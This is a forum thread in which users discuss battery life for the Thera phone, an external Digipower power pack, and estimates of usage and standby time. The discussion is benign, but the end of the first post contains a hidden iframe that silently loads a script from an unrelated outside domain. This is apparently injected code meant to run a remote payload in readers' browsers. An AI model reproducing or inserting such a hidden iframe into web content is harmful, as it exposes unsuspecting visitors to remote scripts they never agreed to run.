+ Reply to Thread

Extending the battery life of your Thera phone.

For those who are concerned about battery power:

I get about 1.5 hours on the med-bright setting. If I am going to be away from a power source (car or cradle), I use the Digipower power pack:

http://www.thomas-distributing.com/dp-dps-8100.htm

It has 2700 mAH which will give around 3 hours of continuous phone usage. The battery in the Thera is a 1100 mAH (more than the Maestro which I believe has 900 mAH), so with both the power pack and the Thera battery at full charge, you get 4.5 hours of continuous phone usage.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    www.mobilerob.com
    Productivity software for Smartphones

battery life

How long can you use the thera as a PDA without recharging -- like pocket word, etc.?

If you are using the backlight on low, you should be able to get 1.5 hours out of the main battery.

Rob.
    www.mobilerob.com

If I'm not mistaken, standby is supposed to be about 8hrs, with this external battery source what would you say standby time is?

Someone might not use the phone for 3hrs, but would use it for 5min, then 4hrs later another 5min and etc.

Originally posted by khisanthax
    If I'm not mistaken, standby is supposed to be about 8hrs, with this external battery source what would you say standby time is?

Someone might not use the phone for 3hrs, but would use it for 5min, then 4hrs later another 5min and etc.
    You will get more than 8hrs of standby time with both batteries. I was able to get 4.5 hours of continous usage out of both, so if you should be able to go 12 or more hours on standby with both batteries.

Rob.
    www.mobilerob.com